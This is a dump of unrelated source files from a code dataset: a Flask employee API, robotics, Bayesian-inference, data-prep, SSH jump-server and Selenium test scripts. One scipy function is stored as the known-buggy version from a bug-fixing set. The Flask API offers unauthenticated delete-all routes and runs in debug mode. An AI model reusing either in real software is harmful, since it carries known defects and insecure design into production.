message\n\n\nclass AllEmployee(Resource):\n def get(self):\n response=returnAll()\n return {'status':response[0],'reply':response[1]}\n\ngroup_name=\"\"\ngroup_admin=0\ngroup_members=[]\nclass CreateGroup(Resource):\n def post(self,name,admin):\n global group_name\n global group_admin\n global group_members\n adminExists=Employee.query.filter_by(id=admin).first()\n if adminExists==None:\n return {'status':'False','reply':\"You are not a registered employee. 
So You are not permitted to create the group\"}\n groupExists=Group.query.filter_by(name=name).first()\n if groupExists==True:\n return {'status':'False','reply':\"A group with requested name already exists\"}\n group_name=name\n group_admin=admin\n group_members.append(admin)\n message={'status':'True','reply':\"You Can Create the Group\"}\n return message\nclass AddMembers(Resource):\n def post(self,empId):\n global group_name\n global group_admin\n global group_member\n print(group_members)\n print(group_name+\" h \"+str(group_admin))\n empExists=Employee.query.filter_by(id=empId).first()\n if empExists==None:\n return {'status':False,'reply':f\"Employee Id {empId} is not a Valid Employee Id.Please Verify\"}\n group_members.append(empId)\n return {'status':True,'reply':\" Valid Employee Id \"}\nclass Create(Resource):\n def post(t=True):\n global group_name\n global group_admin\n global group_member\n response=createGroup(group_name,group_admin,group_members)\n group_members.clear()\n group_name=\"\"\n group_admin=0\n message={'status':response[0],'reply':response[1]}\n return message\n\nclass DeleteEmpId(Resource):\n def post(self,empId):\n response=deleteEmpId(empId)\n message={'status':response[0],'reply':response[1]}\n return message\n\nclass Delete(Resource):\n def get(self):\n response=deleteAll()\n message={'status':response[0],'reply':response[1]}\n print(message)\n return message\n\nclass View(Resource):\n def get(self,groupName):\n print(groupName)\n response=viewGroup(groupName)\n message={'status':response[0],'reply':response[1]}\n if response[0]:\n members=[]\n for m in response[2]:\n members.append(m.empId)\n message['members_ids']=members\n return message\n\napi.add_resource(Insert, '/insert///')\napi.add_resource(Query, '/email_and_key/')\napi.add_resource(CreateGroup, '/CreateGroup//')\napi.add_resource(AddMembers, '/AddMembers/')\napi.add_resource(Create, '/Submit')\napi.add_resource(View, '/viewgroup/')\napi.add_resource(DeleteEmpId, '/Delete/')\napi.add_resource(Delete, '/Delete')\napi.add_resource(AllEmployee,'/queryAll')\n\n\n@app.route('/')\ndef index():\n return \"
The Database is Running
\"\n\nif __name__ == '__main__':\n db.create_all()\n app.run(host=\"localhost\",port=8001,debug=True)\n","sub_path":"database/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":7162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"210004651","text":"import time\nclass Sensor:\n \"\"\"\n 表示连接到Donkey Car的距离测量传感器类。\n \"\"\"\n def __init__(self, pi, range_gpios):\n \"\"\"\n 初始化超声波传感器驱动器\n \"\"\"\n self.pi = pi\n if range_gpios is not None:\n from donkeycar.parts.Driver import Driver\n self.range = Driver(self.pi, range_gpios[0], range_gpios[1])\n else:\n self.range = None\n self.distance = None\n\n def update_loop_body(self):\n \"\"\"\n 获取测量距离,并将其存储在实例变量距离中\n \"\"\"\n self.distance = self.range.read()\n time.sleep(0.03)\n\n def update(self):\n \"\"\"\n 实现在另一个线程中执行的处理。\n       调用距离传感器类并定期将结果测量为实例变量distance并存储 \n \"\"\"\n if self.range is not None:\n while True:\n self.update_loop_body()\n else:\n return None\n \n def run_threaded(self):\n return self.distance\n \n def run(self):\n if self.range is not None:\n self.distance = self.range.read()\n return self.distance\n \n def shutdown(self):\n \"\"\"\n 关闭线程\n \"\"\"\n if self.range is not None:\n self.range.cancel()\n self.range = None\n self.distance = None\n","sub_path":"projects/donkeycar/donkeycar/parts/sonicrangesensor.py","file_name":"sonicrangesensor.py","file_ext":"py","file_size_in_byte":1402,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"523411404","text":"# x = 상 하\n# y = 좌 우\ndef dfs(x, y, n, m, graph):\n if x < 0 or y < 0 or x >= n or y >= m:\n return False\n\n if graph[x][y] == 0:\n graph[x][y] = 1\n\n dfs(x - 1, y, n, m, graph)\n dfs(x, y - 1, n, m, graph)\n dfs(x + 1, y, n, m, graph)\n dfs(x, y + 1, n, m, graph)\n return True\n\n return False\n\n\ndef feeze_drinks(n, m, graph):\n answer = 0\n\n for i in range(n):\n for j in range(m):\n print(i, j)\n if dfs(i, j, n, m, graph):\n answer += 1\n\n return answer\n\n\nif __name__ == '__main__':\n '''\n # n, m 입력\n # n = 4, m = 5\n n, m = map(int, input().split())\n '''\n\n '''\n #예제 1 예시\n 00110\n 00011\n 11111\n 00000\n '''\n\n '''\n graph = []\n for i in range(n):\n graph.append(list(map(int, input())))\n print(\"graph = \", graph)\n '''\n\n print(feeze_drinks(4, 5, [[0, 0, 1, 1, 0],\n [0, 0, 0, 1, 1],\n [1, 1, 1, 1, 1],\n [0, 0, 0, 0, 0]]))\n","sub_path":"robin/python/part02/dfs_bfs/freeze_drinks.py","file_name":"freeze_drinks.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"384911128","text":"import numpy as np\nimport argparse\nimport matplotlib.pyplot as plt\nfrom numpy.core.fromnumeric import var\nfrom scipy import optimize\nfrom scipy import stats\nimport arviz as az\nimport pandas as pd\nimport jax.numpy as jnp\nimport jax.random as random\nimport numpyro\nimport numpyro.distributions as dist\nfrom numpyro.infer import MCMC, NUTS\nfrom numpyro.infer import Predictive\n\n\ndef get_mpsa_brca2_ikbkap_data():\n \"\"\"\n 1. Get data from the MPSA database (BRCA2/IKBKAP 2018).\n 2. Devide Psi = PSI/100\n 3. 
Returns the log(Psi)\n \"\"\"\n psi_df = pd.read_csv('psi_5ss_2018_brca2_ikbkap_smn1.gz')\n psi_df.dropna(inplace=True)\n cond = (psi_df['brca2_9nt'] > 0) & (psi_df['ikbkap_9nt']) > 0\n psi_df = psi_df[cond]\n psi_df.reset_index(inplace=True, drop=True)\n brca2_psi = psi_df['brca2_9nt'].values/100.\n ikbkap_psi = psi_df['ikbkap_9nt'].values/100.\n\n return jnp.log(brca2_psi), jnp.log(ikbkap_psi)\n\n\ndef backg_noise_model(x_psi, y_psi):\n\n x_kernel = stats.gaussian_kde(x_psi)\n opt = optimize.minimize_scalar(lambda x: -x_kernel(x))\n Nx = float(opt.x[0])\n\n y_kernel = stats.gaussian_kde(y_psi)\n opt = optimize.minimize_scalar(lambda x: -y_kernel(x))\n Ny = float(opt.x[0])\n return Nx, Ny\n\n\ndef allelic_manifold(alpha, c, Nx, Ny, w):\n num = w**2+(alpha+1)*w\n denum = num+alpha\n x = num/denum + Nx\n num = (c*w)**2+(c*w)*(alpha+1)\n denum = num+alpha\n y = num/denum + Ny\n return np.log(x), np.log(y)\n\n\ndef model(len_ss, Nx, Ny, obs=None):\n log_alpha = numpyro.sample('log_alpha', dist.Normal())\n log_c = numpyro.sample('log_c', dist.Normal())\n log_w_mean = numpyro.sample('log_w_mean', dist.Normal())\n log_w_sigma = numpyro.sample('log_w_sigma', dist.Gamma(concentration=1,\n rate=1))\n log_w_raw = numpyro.sample(\n 'log_w_raw', dist.Normal(loc=jnp.zeros((len_ss,))))\n alpha = numpyro.deterministic('alpha', jnp.exp(log_alpha))\n\n c = numpyro.deterministic('c', jnp.exp(log_c))\n w = numpyro.deterministic('w', jnp.exp(\n log_w_mean + log_w_sigma * log_w_raw))\n\n num = w**2+(alpha+1)*w\n denum = num+alpha\n mu_x = jnp.log(num/denum + Nx)\n\n num = (c*w)**2+(c*w)*(alpha+1)\n denum = num+alpha\n mu_y = jnp.log(num/denum + Ny)\n\n sigma = numpyro.sample('sigma', dist.Normal(loc=0, scale=0.5))\n numpyro.sample('obs',\n dist.Normal(loc=jnp.stack([mu_x, mu_y], -1), scale=sigma),\n obs=obs)\n\n\ndef main(args):\n rng_jax = random.PRNGKey(0)\n\n # Get data\n x, y = get_mpsa_brca2_ikbkap_data()\n Nx, Ny = backg_noise_model(jnp.exp(x), jnp.exp(y))\n\n kernel = NUTS(model, target_accept_prob=0.99)\n mcmc = MCMC(kernel, num_warmup=args.num_warmup,\n num_samples=args.num_samples,\n num_chains=args.num_chains)\n mcmc.run(rng_jax,\n len_ss=x.shape[0],\n Nx=Nx,\n Ny=Ny,\n obs=jnp.c_[x, y])\n # Convert the inference data to arviz for plotting and load later.\n posterior_samples = mcmc.get_samples()\n posterior_predictive = Predictive(model, posterior_samples)(random.PRNGKey(1),\n Nx=Nx,\n Ny=Ny,\n len_ss=x.shape[0])\n prior = Predictive(model, num_samples=500)(\n random.PRNGKey(10), Nx=Nx, Ny=Ny, len_ss=x.shape[0])\n az_data = az.from_numpyro(\n mcmc, prior=prior, posterior_predictive=posterior_predictive)\n # Saving inference data to the netcfd format\n az.plot_trace(az_data, var_names=['log_alpha', 'alpha'])\n plt.show()\n # az_data.to_netcdf(\n # f'res_N{args.num_samples}_C{args.num_chains}_W{args.num_warmup}_fixed_noise.nc')\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"Bayesian inference for one step delay model\")\n parser.add_argument(\"-n\",\n \"--num_samples\",\n nargs=\"?\",\n default=200,\n type=int)\n parser.add_argument(\"-w\", \"--num_warmup\", nargs=\"?\",\n default=1000, type=int)\n parser.add_argument(\"-c\", \"--num_chains\", nargs=\"?\",\n default=4, type=int)\n parser.add_argument(\"--device\",\n default=\"cpu\",\n type=str,\n help='use \"cpu\" or \"gpu\".')\n args = parser.parse_args()\n\n numpyro.set_platform(args.device)\n numpyro.set_host_device_count(args.num_chains)\n\n 
main(args)\n","sub_path":"numpyro_src/inference_one_step_fixed_noise.py","file_name":"inference_one_step_fixed_noise.py","file_ext":"py","file_size_in_byte":4662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"53885826","text":"import torch\nfrom cyy_torch_toolbox.data_structure.torch_process_task_queue import \\\n TorchProcessTaskQueue\n\n\ndef hello(tasks, **kwargs):\n assert tasks == [()]\n return {\"1\": torch.Tensor([1, 2, 3])}\n\n\ndef test_process_task_queue():\n queue = TorchProcessTaskQueue(\n hello, send_tensor_in_cpu=True, assemble_tensor=True, batch_process=True\n )\n queue.start()\n queue.add_task(())\n res = queue.get_data()\n assert len(res) == 1\n assert \"1\" in res\n assert res[\"1\"].tolist() == [1, 2, 3]\n queue.stop()\n","sub_path":"cyy_torch_toolbox/test/data_structure/test_torch_process_task_queue.py","file_name":"test_torch_process_task_queue.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"443023110","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nfrom logger import setup_custom_logger\nfrom file_writer import file_writer\nimport sys\nimport pandas as pd\nimport cbsodata\nfrom msg import *\n\n\nlogger = setup_custom_logger(\"B009_New_Building_Permits\")\nlogger.info(\"---------------------------------------------------\")\nlogger.info(txtStarting + \" \" + logger.name)\n\ndataset_id = \"83671NED\"\nlogger.info(f\"Retrieve data from dataset {dataset_id}\")\ntry:\n df = pd.DataFrame(\n cbsodata.get_data(\n \"83671NED\",\n filters=\"Perioden gt '2012' and Opdrachtgever ne 'T001209' and Eigendom ne'T001258'\",\n select=[\n \"RegioS\",\n \"Perioden\",\n \"Opdrachtgever\",\n \"Eigendom\",\n \"Woningen_2\",\n \"Wooneenheden_3\",\n \"Recreatiewoningen_4\",\n ],\n )\n )\nexcept:\n logger.exception(\"API incorrectly loaded\")\n raise\n\n\ntry:\n df = df.groupby([\"Perioden\", \"Opdrachtgever\", \"Eigendom\"]).agg(\n {\"Woningen_2\": [\"sum\"], \"Wooneenheden_3\": sum, \"Recreatiewoningen_4\": sum}\n )\n df = df.reset_index()\nexcept:\n logger.exception(\"Grouping data failed\")\n raise\n\n\n# Date formatting and quarter format\ntry:\n df[\"Perioden\"] = df[\"Perioden\"].str.replace(\" 1e kwartaal\", \"-03-01\")\n df[\"Perioden\"] = df[\"Perioden\"].str.replace(\" 2e kwartaal\", \"-06-01\")\n df[\"Perioden\"] = df[\"Perioden\"].str.replace(\" 3e kwartaal\", \"-09-01\")\n df[\"Perioden\"] = df[\"Perioden\"].str.replace(\" 4e kwartaal\", \"-12-01\")\n df[\"Perioden\"] = pd.to_datetime(df[\"Perioden\"]).dt.date\nexcept:\n logger.exception(\n \"Columns could not be changed to monthly numbers or formatted to different date\"\n )\n raise\n\n\ntry:\n file_writer(df, \"B009_New_Building_Permits\")\n logger.info(txtDone)\nexcept:\n logger.exception(\"Exporting failed\")\n raise\n","sub_path":"sse-aai-zsa/Zsa/scripts/B009_New_Building_Permits.py","file_name":"B009_New_Building_Permits.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"313895183","text":"import tarfile\nimport random\n\n\ndef thawing():\n # 解凍\n with tarfile.open(\"rt-polaritydata.tar.gz\", \"r:*\") as tar:\n tar.extractall()\n tar = list(tar)\n negfile = tar[1].name\n posfile = tar[2].name\n return negfile, posfile\n\n\ndef input_neg_pos(negfile, posfile):\n # ファイル読み込み\n with open(negfile, \"r\", encoding=\"cp1252\") as negf,\\\n open(posfile, \"r\", 
encoding=\"cp1252\") as posf:\n neg_lines = negf.readlines()\n pos_lines = posf.readlines()\n\n return neg_lines, pos_lines\n\n\ndef count_neg_pos(filepath: str):\n with open(filepath, \"r\", encoding=\"cp1252\") as inf:\n lines = inf.readlines()\n pos_count = 0\n neg_count = 0\n for l in lines:\n if \"+1\" in l:\n pos_count += 1\n elif \"-1\" in l:\n neg_count += 1\n print(\"pos: {0}, neg: {1}\".format(pos_count, neg_count))\n\n\nif __name__ == \"__main__\":\n negfile, posfile = thawing()\n neg_lines, pos_lines = input_neg_pos(negfile, posfile)\n\n new_pos_lines = [\"+1 \" + line for line in pos_lines]\n new_neg_lines = [\"-1 \" + line for line in neg_lines]\n new_lines = new_pos_lines + new_neg_lines\n random.shuffle(new_lines)\n filepath = \"sentiment.txt\"\n with open(filepath, \"w\", encoding=\"cp1252\") as outf:\n outf.writelines(new_lines)\n\n count_neg_pos(filepath)\n","sub_path":"matsubara/Chap8/knock70.py","file_name":"knock70.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"565533121","text":"from datetime import datetime\n\n\ndef getStats(chatData):\n stats = {}\n stats[\"count\"] = len(chatData[\"messages\"])\n stats[\"daycounts\"] = getDayCounts(chatData[\"messages\"])\n return stats\n\n\ndef getDayCounts(messages):\n daycounts = {\n \"Sunday\": 0,\n \"Monday\": 0,\n \"Tuesday\": 0,\n \"Wednesday\": 0,\n \"Thursday\": 0,\n \"Friday\": 0,\n \"Saturday\": 0\n }\n\n for message in messages:\n daycounts[getDay(message[\"timestamp_ms\"])] += 1\n\n return daycounts\n\n\ndef getDay(ep_time):\n # consider converting all timestamp_ms to this format, then extract desired information at each step once\n return datetime.fromtimestamp(ep_time/1000).strftime(\"%A\")\n","sub_path":"Analysis/chatStats.py","file_name":"chatStats.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"358483478","text":"# _*_coding:utf-8_*_\n# __author__ = 'Alex Li'\nimport sys\nimport traceback\nimport time\nfrom core.redis_handler import Redis_Handler\nimport paramiko\n\ntry:\n import interactive\nexcept ImportError:\n from . 
import interactive\n\n\ndef ssh_login(user_obj, bind_host_obj):\n # now, connect and use paramiko Client to negotiate SSH2 across the connection\n try:\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.WarningPolicy())\n print('*** Connecting...')\n # client.connect(hostname, port, username, password)\n client.connect(bind_host_obj.host.ip_addr,\n bind_host_obj.host.port,\n bind_host_obj.remoteuser.username,\n bind_host_obj.remoteuser.password,\n timeout=30)\n chan = client.invoke_shell()\n print(repr(client.get_transport()))\n print('*** Here we go!\\n')\n log = dict(user_id=user_obj.id,\n bind_host_id=bind_host_obj.id,\n action_type='login',\n cmd=\"\",\n date=time.time())\n Redis_Handler.push(log)\n interactive.interactive_shell(chan, user_obj, bind_host_obj)\n chan.close()\n client.close()\n except Exception as e:\n print('*** Caught exception: %s: %s' % (e.__class__, e))\n traceback.print_exc()\n try:\n client.close()\n except:\n pass\n sys.exit(1)\n","sub_path":"14、练习的项目/15_堡垒机/my_jump_server/core/ssh_login.py","file_name":"ssh_login.py","file_ext":"py","file_size_in_byte":1522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619532995","text":"def _get_submatrix(self, slice0, slice1):\n 'Return a submatrix of this matrix (new matrix is created).'\n (slice0, slice1) = self._swap((slice0, slice1))\n (shape0, shape1) = self._swap(self.shape)\n\n def _process_slice(sl, num):\n if isinstance(sl, slice):\n (i0, i1) = (sl.start, sl.stop)\n if (i0 is None):\n i0 = 0\n elif (i0 < 0):\n i0 = (num + i0)\n if (i1 is None):\n i1 = num\n elif (i1 < 0):\n i1 = (num + i1)\n return (i0, i1)\n elif np.isscalar(sl):\n if (sl < 0):\n sl += num\n return (sl, (sl + 1))\n else:\n return (sl[0], sl[1])\n\n def _in_bounds(i0, i1, num):\n if ((not (0 <= i0 < num)) or (not (0 < i1 <= num)) or (not (i0 < i1))):\n raise IndexError(('index out of bounds: 0<=%d<%d, 0<=%d<%d, %d<%d' % (i0, num, i1, num, i0, i1)))\n (i0, i1) = _process_slice(slice0, shape0)\n (j0, j1) = _process_slice(slice1, shape1)\n _in_bounds(i0, i1, shape0)\n _in_bounds(j0, j1, shape1)\n aux = _sparsetools.get_csr_submatrix(shape0, shape1, self.indptr, self.indices, self.data, i0, i1, j0, j1)\n (data, indices, indptr) = (aux[2], aux[1], aux[0])\n shape = self._swap(((i1 - i0), (j1 - j0)))\n return self.__class__((data, indices, indptr), shape=shape)","sub_path":"Data Set/bug-fixing-4/2cb1c7474547dcb6dfa0bd32d335d5d34cf3e86a-<_get_submatrix>-bug.py","file_name":"2cb1c7474547dcb6dfa0bd32d335d5d34cf3e86a-<_get_submatrix>-bug.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"435695867","text":"#!/usr/bin/env python\n\n'''\nThis module contains a minimal metadata writer class for quickly making\nmetadata\n\n'''\n\n\nimport xml.etree.ElementTree as ET\nimport os\n\nsub = ET.SubElement\n\n\nclass MetaWriter:\n '''\n Writes a metadata file based on the given filename and user input\n \n '''\n\n def __init__(self, datapath):\n '''\n Class takes in a datafile path name and creates an xml tree using the\n column heading of the recarray generated from the csv file.\n\n Parameters\n ----------\n datapath : string\n Datafile name\n\n '''\n assert datapath[-4:] == '.csv', \"%s must end in .csv\" % (datapath)\n self.filename = datapath.split('.')[0]\n fin = open(datapath, 'r')\n self.column_names = fin.readline().strip().split(',')\n 
fin.close()\n self.root = ET.Element('eml:eml')\n self.root.attrib = {'packageId' : self.filename, 'system' : 'knb',\n \"xmlns:eml\" : \"eml://ecoinformatics.org/eml-2.1.0\", 'xmlns:xsi': \n \"http://www.w3.org/2001/XMLSchema-instance\", \"xsi:schemaLocation\"\n : \"eml://ecoinformatics.org/eml-2.1.0 eml.xsd\"}\n self.dataset = sub(self.root, 'dataset')\n self.title = sub(self.dataset, 'title')\n self.title.text = \"Data set \" + os.path.split(datapath)[1]\n\n self.creator = sub(self.dataset, 'creator')\n self.individualName = sub(self.creator, 'individualName')\n self.surName = sub(self.individualName, 'surName')\n self.surName.text = \"None\"\n\n self.contact = sub(self.dataset, 'contact')\n self.individualName2 = sub(self.contact, 'individualName')\n self.surName2 = sub(self.individualName2, 'surName')\n self.surName2.text = \"None\"\n\n self.dataTable = sub(self.dataset, 'dataTable')\n\n self.entityName = sub(self.dataTable, 'entityName')\n self.entityName.text = os.path.split(datapath)[1]\n\n self.physical = sub(self.dataTable, 'physical')\n self.objectName = sub(self.physical, 'objectName')\n self.objectName.text = os.path.split(datapath)[1]\n self.size = sub(self.physical, 'size')\n self.size.attrib = {'unit' : \"byte\"}\n self.size.text = str(os.path.getsize(datapath))\n \n # Nested in physical\n self.dataFormat = sub(self.physical, 'dataFormat')\n self.textFormat = sub(self.dataFormat, 'textFormat')\n self.numHeaderLines = sub(self.textFormat, 'numHeaderLines')\n self.numHeaderLines.text = \"1\"\n self.recordDelimiter = sub(self.textFormat, 'recordDelimiter')\n self.recordDelimiter.text = \"#x0A\"\n self.attributeOrientation = sub(self.textFormat, 'attributeOrientation')\n self.attributeOrientation.text = \"column\"\n self.simpleDelimited = sub(self.textFormat, 'simpleDelimited')\n self.fieldDelimiter = sub(self.simpleDelimited, 'fieldDelimiter')\n self.fieldDelimiter.text = \",\"\n \n self.distribution = sub(self.physical, 'distribution')\n self.online = sub(self.distribution, 'online')\n self.url = sub(self.online, 'url')\n self.url.text = \"macroeco://\" + os.path.split(datapath)[1]\n \n\n self.attributeList = sub(self.dataTable, 'attributeList')\n self.attributes = []\n self.attributeTypes = []\n for i, name in enumerate(self.column_names):\n attribute = sub(self.attributeList, 'attribute')\n attributeName = sub(attribute, 'attributeName')\n attributeDefinition = sub(attribute, 'attributeDefinition')\n attributeDefinition.text = \"None\"\n measurementScale = sub(attribute, 'measurementScale')\n\n # Default Ordinal\n attributeType = sub(measurementScale, 'ordinal')\n nonNumericDomain = sub(attributeType,'nonNumericDomain')\n textDomain = sub(nonNumericDomain, 'textDomain')\n definition = sub(textDomain, 'definition')\n definition.text = \"None\"\n\n attributeName.text = name\n self.attributes.append(attribute)\n self.attributeTypes.append(attributeType)\n\n self.numberOfRecords = sub(self.dataTable, 'numberOfRecords')\n self.numberOfRecords.text = \"Unknown\"\n\n def add_attribute_types(self, typelist):\n '''\n Sets the type of the attribute to either ordinal (categorical) or\n interval (categorical). Initialized in constructor as ordinal. \n\n Parameters\n ----------\n typelist : list\n A list of tuples. Each tuple contains 2 elements: a string and a\n dict. 
The dict must contain the keyword cat (categorical) or a \n            KeyError will be thrown.\n\n        Example of typelist:\n\n        [('x', {'cat' : True}), ('y', {'cat' : True}), ('year',\n        {'cat' : False})]\n\n        '''\n\n        for item in typelist:\n            for attribute in self.attributes:\n                tree = ET.ElementTree(attribute)\n                att = tree.findall('attributeName')[0]\n                if (att.text == item[0]):\n                    measure = tree.findall('measurementScale')[0]\n                    if item[1]['cat'] == True:\n                        if len(measure.findall('interval')) == 1:\n                            measure.remove(measure.find('interval'))\n                            att_type = sub(measure, 'ordinal')\n                            nonNumericDomain = sub(att_type,'nonNumericDomain')\n                            textDomain = sub(nonNumericDomain, 'textDomain')\n                            definition = sub(textDomain, 'definition')\n                            definition.text = \"None\"\n\n                        elif len(measure.findall('ordinal')) == 1:\n                            measure.remove(measure.find('ordinal'))\n                            att_type = sub(measure, 'ordinal')\n                            nonNumericDomain = sub(att_type,'nonNumericDomain')\n                            textDomain = sub(nonNumericDomain, 'textDomain')\n                            definition = sub(textDomain, 'definition')\n                            definition.text = \"None\"\n\n                    elif item[1]['cat'] == False:\n\n                        if len(measure.findall('ordinal')) == 1:\n                            measure.remove(measure.find('ordinal'))\n                            att_type = sub(measure, 'interval')\n                            unit = sub(att_type, 'unit')\n                            standardUnit = sub(unit, 'standardUnit')\n                            standardUnit.text = \"dimensionless\"\n                            precision = sub(att_type, 'precision')\n                            precision.text = \"0\"\n                            numericDomain = sub(att_type, 'numericDomain')\n                            numberType = sub(numericDomain, 'numberType')\n                            numberType.text = 'natural'\n\n\n                        elif len(measure.findall('interval')) == 1:\n                            measure.remove(measure.find('interval'))\n                            att_type = sub(measure, 'interval')\n                            unit = sub(att_type, 'unit')\n                            standardUnit = sub(unit, 'standardUnit')\n                            standardUnit.text = \"dimensionless\"\n                            precision = sub(att_type, 'precision')\n                            precision.text = \"0\"\n                            numericDomain = sub(att_type, 'numericDomain')\n                            numberType = sub(numericDomain, 'numberType')\n                            numberType.text = 'natural'\n\n    def add_attribute_traits(self, traitlist):\n        '''\n        Adds traits to the attributes contained in self.attributes as specified\n        by the traitlist. Traitlist is a list of tuples with each tuple\n        containing two elements: the attribute name (string) and a dictionary\n        of traits to be added to the attribute. If the type of the trait is\n        ordinal, nothing will be changed. Only traits with type interval will\n        be appended to. \n        \n        Parameters\n        ----------\n        traitlist : list\n            A list of 2 element tuples where the first element contains a\n            string and the second element contains a dict. See example in\n            docstring. The only keywords that are recognized are maximum,\n            minimum, and precision.\n\n        Example of traitlist:\n\n        [('x', {'minimum' : '0', 'maximum' : '100'}), ('y', {'precision' :\n        '0.1'})]\n        \n        '''\n\n        for item in traitlist:\n            for attribute in self.attributes:\n                tree = ET.ElementTree(attribute)\n                child = tree.findall('attributeName')[0]\n                if child.text == item[0]:\n                    #TODO:Cleaner way to do this than with if?\n                    measure = tree.findall('measurementScale')[0]\n                    if len(measure.findall('interval')) == 1:\n                        interval = measure.findall('interval')[0]\n                        for key in item[1].iterkeys():\n                            if key == 'precision':\n                                prec = interval.findall('precision')\n                                if len(prec) == 0:\n                                    precision = sub(interval, 'precision')\n                                    precision.text = str(item[1][key])\n                                elif len(prec) == 1:\n                                    prec[0].text = str(item[1][key])\n                            elif key == 'minimum':\n                                numericDomain =\\\n                                    interval.findall('numericDomain')[0]\n                                bnd = numericDomain.findall('bounds')\n                                if len(bnd) == 0:\n                                    bounds = sub(numericDomain, 'bounds')\n                                    minimum = sub(bounds, 'minimum')\n                                    minimum.attrib = {'exclusive' :\n                                                            'false'}\n                                    minimum.text = str(item[1][key])\n                                elif len(bnd) == 1:\n                                    mins = bnd[0].findall('minimum')\n                                    if len(mins) == 0:\n                                        minimum = sub(bnd[0], 'minimum')\n                                        minimum.attrib = {'exclusive' :\n                                                            'false'}\n                                        minimum.text = str(item[1][key])\n                                    elif len(mins) == 1:\n                                        bnd[0].remove(mins[0])\n                                        minimum = sub(bnd[0], 'minimum')\n                                        minimum.attrib = {'exclusive' :\n                                                            'false'}\n                                        minimum.text = str(item[1][key])\n                            elif key == 'maximum':\n                                numericDomain =\\\n                                    interval.findall('numericDomain')[0]\n                                bnd = numericDomain.findall('bounds')\n                                if len(bnd) == 0:\n                                    bounds = sub(numericDomain, 'bounds')\n                                    maximum = sub(bounds, 'maximum')\n                                    maximum.attrib = {'exclusive' :\n                                                            'false'}\n                                    maximum.text = str(item[1][key])\n                                elif len(bnd) == 1:\n                                    maxs = bnd[0].findall('maximum')\n                                    if len(maxs) == 0:\n                                        maximum = sub(bnd[0], 'maximum')\n                                        maximum.attrib = {'exclusive' :\n                                                            'false'}\n                                        maximum.text = str(item[1][key])\n                                    elif len(maxs) == 1:\n                                        bnd[0].remove(maxs[0])\n                                        maximum = sub(bnd[0], 'maximum')\n                                        maximum.attrib = {'exclusive' :\n                                                            'false'}\n                                        maximum.text = str(item[1][key])\n\n\n\n    def write_meta_data(self, name=None):\n        '''\n        Writes out the xml tree that is contained in self.root and saves an\n        .xml file in the current working directory under the given filename. If\n        no name is given, saves the xml under the same name as the input file.\n\n        \n        '''\n        \n        tree = ET.ElementTree(self.root)\n        if name == None:\n            tree.write(self.filename + '.xml')\n        else:\n            tree.write(name + '.xml')\n\n        \n\n\n\n\n\n\n","sub_path":"utils/metadata_writer.py","file_name":"metadata_writer.py","file_ext":"py","file_size_in_byte":13211,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
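The metadata_writer.py record above builds its EML tree by chaining `xml.etree.ElementTree.SubElement` calls (aliased as `sub`) and by swapping a `measurementScale` child in place. The following is a minimal standalone sketch of that pattern, not part of the dataset; the element and tag names mirror the record, but the snippet itself is illustrative only.

```python
# Standalone sketch of the SubElement pattern used by metadata_writer.py:
# build an EML-style attribute, then switch its scale from ordinal to interval.
import xml.etree.ElementTree as ET
from xml.etree.ElementTree import SubElement as sub

attribute = ET.Element('attribute')
sub(attribute, 'attributeName').text = 'year'
measure = sub(attribute, 'measurementScale')
sub(measure, 'ordinal')  # default scale, as in the constructor above

# Replace the ordinal scale with an interval one, as add_attribute_types does.
old = measure.find('ordinal')
if old is not None:
    measure.remove(old)
interval = sub(measure, 'interval')
sub(interval, 'precision').text = '0'

print(ET.tostring(attribute, encoding='unicode'))
```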
{"seq_id":"28554699","text":"from selenium import webdriver\nimport time\n\ntry:\n\n    link = \"http://suninjuly.github.io/registration2.html\"\n    browser = webdriver.Chrome()\n    browser.get(link)\n    textarea = browser.find_element_by_css_selector('input:required.form-control.first')\n    textarea.send_keys(\"mikhail\")\n    textarea = browser.find_element_by_css_selector('input:required.form-control.second')\n    textarea.send_keys(\"input.form-control.second\")\n    textarea = browser.find_element_by_css_selector('input:required.form-control.third')\n    textarea.send_keys(\"blablab333@mail.ru\")\n    textarea = browser.find_element_by_xpath('/html/body/div[1]/form/div[2]/div[1]/input')\n    textarea.send_keys(\"bwebe\")\n    textarea = browser.find_element_by_xpath('/html/body/div[1]/form/div[2]/div[2]/input')\n    textarea.send_keys(\"123\")\n    time.sleep(3)\n    button = browser.find_element_by_css_selector(\"button.btn\")\n    button.click()\n    # find the element that contains the text\n    welcome_text_elt = browser.find_element_by_tag_name(\"h1\")\n    # store the text from the welcome_text_elt element in the welcome_text variable\n    welcome_text = welcome_text_elt.text\n    # use assert to check that the expected text matches the text on the page\n    assert \"Congratulations! You have successfully registered!\" == welcome_text\n\nfinally:\n    time.sleep(5)\n    browser.quit()","sub_path":"Module-1.searchRequiredInput.py","file_name":"Module-1.searchRequiredInput.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
